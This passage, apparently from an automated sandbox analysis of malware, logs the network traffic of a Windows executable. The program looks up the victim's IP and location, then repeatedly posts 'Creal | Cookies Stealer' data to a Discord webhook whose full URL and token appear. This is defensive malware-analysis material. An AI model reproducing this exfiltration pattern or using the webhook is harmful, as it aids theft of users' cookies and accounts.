Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=7ad43c1cb07092dd708b3c6e0f1bdcacbed004e5-1727453934; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:18:54 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 73 75 77 58 71 57 56 62 64 36 44 49 43 75 4e 37 53 4a 61 70 6c 75 75 42 64 75 53 61 76 72 68 4c 36 48 6d 63 53 79 35 6c 6a 66 41 2d 31 37 32 37 34 35 33 39 33 34 32 30 36 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 63 66 66 30 35 62 35 37 34 33 62 63 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=suwXqWVbd6DICuN7SJapluuBduSavrhL6HmcSy5ljfA-1727453934206-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9ccff05b5743bc-EWR
2024-09-27 16:18:54 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.8	49732	172.67.74.152	443	4040	C:\Users\user\Desktop\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:18:55 UTC	117	OUT	GET / HTTP/1.1 Accept-Encoding: identity Host: api.ipify.org User-Agent: Python-urllib/3.12 Connection: close
2024-09-27 16:18:55 UTC	211	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 16:18:55 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8c9ccffacc938cdd-EWR
2024-09-27 16:18:55 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.8	49733	159.89.102.253	443	4040	C:\Users\user\Desktop\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:18:56 UTC	139	OUT	GET /jsonp/8.46.123.33 HTTP/1.1 Accept-Encoding: identity Host: geolocation-db.com User-Agent: Python-urllib/3.12 Connection: close
2024-09-27 16:18:56 UTC	206	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Fri, 27 Sep 2024 16:18:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: *
2024-09-27 16:18:56 UTC	171	IN	Data Raw: 61 30 0d 0a 63 61 6c 6c 62 61 63 6b 28 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 69 74 79 22 3a 6e 75 6c 6c 2c 22 70 6f 73 74 61 6c 22 3a 6e 75 6c 6c 2c 22 6c 61 74 69 74 75 64 65 22 3a 33 37 2e 37 35 31 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 39 37 2e 38 32 32 2c 22 49 50 76 34 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 73 74 61 74 65 22 3a 6e 75 6c 6c 7d 29 0d 0a 30 0d 0a 0d 0a Data Ascii: a0callback({"country_code":"US","country_name":"United States","city":null,"postal":null,"latitude":37.751,"longitude":-97.822,"IPv4":"8.46.123.33","state":null})0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.8	49734	162.159.136.232	443	4040	C:\Users\user\Desktop\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:18:57 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 647 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:18:57 UTC	647	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 43 6f 6f 6b 69 65 73 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 3a 2a 2a 5c 6e 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 3a 63 6f 6f 6b 69 65 73 5f 74 6c 6d 3a 38 31 36 36 31 39 30 36 33 36 31 38 35 36 38 32 33 34 3e 20 5c 75 32 30 32 32 20 2a 2a 32 2a 2a 20 43 6f 6f 6b 69 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal \| Cookies Stealer", "description": "<:apollondelirmis:1012370180845883493>: Accounts:\n\n\n\nData:\n<:cookies_tlm:816619063618568234> \u2022 2 Cooki
2024-09-27 16:18:57 UTC	1343	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:18:57 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=329b7f587cec11ef8759067ba21bebfe; Expires=Wed, 26-Sep-2029 16:18:57 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1727453938 x-ratelimit-reset-after: 1 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=weV7j%2B%2Fcm0bfSD3Kn5sHq07M%2B6lbS%2FhKRcUWz6GP83C28ALA2TC5IRp1Lnk%2FvXKu7XEUfSZdbjm%2F9wbpO9eAUdfRwHnrRcLpwbE2MFiD9lvZPxM5vDfOXpI8UQi%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=329b7f587cec11ef8759067ba21bebfed62991a5c924e1de9d3ff54e7f992b67e3ad9dec8eea5d81c7fdcb92c1cf2105; Expires=Wed, 26-Sep-2029 16:18:57 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=8e1ec1b277cf704c68f172d827a97e5d2a5c3a4f-1727453937; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:18:57 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 48 58 31 4c 66 67 6d 61 6c 66 68 37 6e 6a 6d 6e 47 42 66 39 68 4e 79 31 4e 63 38 65 34 33 4e 50 4d 78 78 47 32 55 59 66 36 64 63 2d 31 37 32 37 34 35 33 39 33 37 35 31 34 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 30 35 30 39 38 62 30 66 37 66 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=HX1Lfgmalfh7njmnGBf9hNy1Nc8e43NPMxxG2UYf6dc-1727453937514-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd005098b0f7f-EWR
2024-09-27 16:18:57 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.8	49735	162.159.136.232	443	4040	C:\Users\user\Desktop\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:18:58 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 647 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:18:58 UTC	647	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 43 6f 6f 6b 69 65 73 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 3a 2a 2a 5c 6e 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 3a 63 6f 6f 6b 69 65 73 5f 74 6c 6d 3a 38 31 36 36 31 39 30 36 33 36 31 38 35 36 38 32 33 34 3e 20 5c 75 32 30 32 32 20 2a 2a 32 2a 2a 20 43 6f 6f 6b 69 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal \| Cookies Stealer", "description": "<:apollondelirmis:1012370180845883493>: Accounts:\n\n\n\nData:\n<:cookies_tlm:816619063618568234> \u2022 2 Cooki
2024-09-27 16:18:58 UTC	1335	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:18:58 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=330b72687cec11ef9d31a6b2eb948c40; Expires=Wed, 26-Sep-2029 16:18:58 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1727453939 x-ratelimit-reset-after: 1 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aqWDRFTvp7syoDR0H0EdkpPkq3D6OAiDbXYchTpVg1lH%2FyKK23Jg8JVi4zzOfjiOU2VkxUu%2FiviTs%2BWpF77UbgrKT78LhNpFboinuacLDIMb7OSPGJ8LlTrFbJmH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=330b72687cec11ef9d31a6b2eb948c403f464fd8fe449b60da10b36b6a4d7712c0782e29ea00433a3fce18170ff87869; Expires=Wed, 26-Sep-2029 16:18:58 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=91e624c7b228afc6fcf83acd401688349adc8fc6-1727453938; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:18:58 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 36 34 79 46 53 62 67 63 51 59 6b 31 61 4a 69 49 50 66 43 34 4b 47 61 31 4a 38 78 44 58 4f 72 65 69 33 5f 47 54 63 5a 5a 77 55 73 2d 31 37 32 37 34 35 33 39 33 38 32 36 30 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 30 39 36 38 62 65 38 63 63 38 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=64yFSbgcQYk1aJiIPfC4KGa1J8xDXOrei3_GTcZZwUs-1727453938260-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd00968be8cc8-EWR
2024-09-27 16:18:58 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.8	49736	162.159.136.232	443	4040	C:\Users\user\Desktop\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:18:58 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 647 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:18:58 UTC	647	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 43 6f 6f 6b 69 65 73 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 3a 2a 2a 5c 6e 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 3a 63 6f 6f 6b 69 65 73 5f 74 6c 6d 3a 38 31 36 36 31 39 30 36 33 36 31 38 35 36 38 32 33 34 3e 20 5c 75 32 30 32 32 20 2a 2a 32 2a 2a 20 43 6f 6f 6b 69 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal \| Cookies Stealer", "description": "<:apollondelirmis:1012370180845883493>: Accounts:\n\n\n\nData:\n<:cookies_tlm:816619063618568234> \u2022 2 Cooki
2024-09-27 16:18:58 UTC	1341	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:18:58 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=3373e0aa7cec11efb69c0e478e5d82a7; Expires=Wed, 26-Sep-2029 16:18:58 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1727453940 x-ratelimit-reset-after: 1 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E6JgMhDovB4s%2Fqu%2BJZullT8n%2BwHKbJcn3kZhxpXnvc3fa1TJ9y%2FeZ4cxlc1s8jSaPbpV0qIbnFfs1G8nI%2B9tbaWi%2B8NdUhlK05jQUIogMItQdqxJgplU3GKx1Lzj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=3373e0aa7cec11efb69c0e478e5d82a7b55a41caa7f284bfb007246733a54c791206f9615674ad856e7525e21bb19b34; Expires=Wed, 26-Sep-2029 16:18:58 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=91e624c7b228afc6fcf83acd401688349adc8fc6-1727453938; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:18:58 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 38 2e 6c 72 67 74 30 41 51 2e 44 5a 2e 2e 66 71 79 53 44 50 78 6e 36 39 45 51 53 67 4b 43 63 31 47 4a 37 68 36 50 34 42 71 63 6f 2d 31 37 32 37 34 35 33 39 33 38 39 32 36 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 30 64 65 39 34 61 37 63 36 61 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=8.lrgt0AQ.DZ..fqySDPxn69EQSgKCc1GJ7h6P4Bqco-1727453938926-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd00de94a7c6a-EWR
2024-09-27 16:18:58 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.8	49737	162.159.136.232	443	4040	C:\Users\user\Desktop\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:18:59 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 647 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:18:59 UTC	647	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 43 6f 6f 6b 69 65 73 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 3a 2a 2a 5c 6e 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 3a 63 6f 6f 6b 69 65 73 5f 74 6c 6d 3a 38 31 36 36 31 39 30 36 33 36 31 38 35 36 38 32 33 34 3e 20 5c 75 32 30 32 32 20 2a 2a 32 2a 2a 20 43 6f 6f 6b 69 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal \| Cookies Stealer", "description": "<:apollondelirmis:1012370180845883493>: Accounts:\n\n\n\nData:\n<:cookies_tlm:816619063618568234> \u2022 2 Cooki
2024-09-27 16:18:59 UTC	1333	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:18:59 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=33dc716a7cec11ef890f96ff52647fd0; Expires=Wed, 26-Sep-2029 16:18:59 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1727453940 x-ratelimit-reset-after: 1 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JPeZZdHiAL4LQe81%2B6lNMjplFr7IRKU57LCtkAiCXxOEsMSGoJckKZmAGjtXlSF8nSWG9pmlT7tGv9VcVg3S7e4fO%2B1K04nLUgleimJPiEv8DYqH4XYMgJZXN9SP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=33dc716a7cec11ef890f96ff52647fd0765c1bad81131c38e995494547fec0b7c3e82588608aa36ea38fba7f4e69523c; Expires=Wed, 26-Sep-2029 16:18:59 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=5021d9c541e5ec266375367b8a579b9688877fb3-1727453939; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:18:59 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 6d 65 34 77 58 56 54 54 4c 34 49 75 56 6e 56 51 57 55 37 7a 48 68 76 4d 69 47 46 6c 62 72 79 52 48 62 32 78 76 77 55 7a 4a 72 6f 2d 31 37 32 37 34 35 33 39 33 39 36 31 31 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 31 32 31 65 62 39 30 66 37 30 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=me4wXVTTL4IuVnVQWU7zHhvMiGFlbryRHb2xvwUzJro-1727453939611-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd0121eb90f70-EWR
2024-09-27 16:18:59 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.8	49738	162.159.136.232	443	4040	C:\Users\user\Desktop\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:00 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 647 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:19:00 UTC	647	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 43 6f 6f 6b 69 65 73 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 3a 2a 2a 5c 6e 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 3a 63 6f 6f 6b 69 65 73 5f 74 6c 6d 3a 38 31 36 36 31 39 30 36 33 36 31 38 35 36 38 32 33 34 3e 20 5c 75 32 30 32 32 20 2a 2a 32 2a 2a 20 43 6f 6f 6b 69 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal \| Cookies Stealer", "description": "<:apollondelirmis:1012370180845883493>: Accounts:\n\n\n\nData:\n<:cookies_tlm:816619063618568234> \u2022 2 Cooki
2024-09-27 16:19:00 UTC	1329	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:19:00 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=34574a527cec11efa2060e62cbdde762; Expires=Wed, 26-Sep-2029 16:19:00 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1727453941 x-ratelimit-reset-after: 1 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GunBpw3H93FVr7nxI3vW7UWUSuJqVO2CDJFBsYOURr30lgS4j2kSaKca8KnZKv8PUtU2PNeMfdfw4iS4KU1fzdd6HV1jMXtvWxRLm2zmvvs6u5Fy47rHLV8EdIP6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=34574a527cec11efa2060e62cbdde76223474cb28fd6dbbf2103019ed06984a82fe56697383b506ece1febe3e8d3e11f; Expires=Wed, 26-Sep-2029 16:19:00 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=7affd72039bfc759ddd7d629cf7feaa78cb7e6c9-1727453940; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
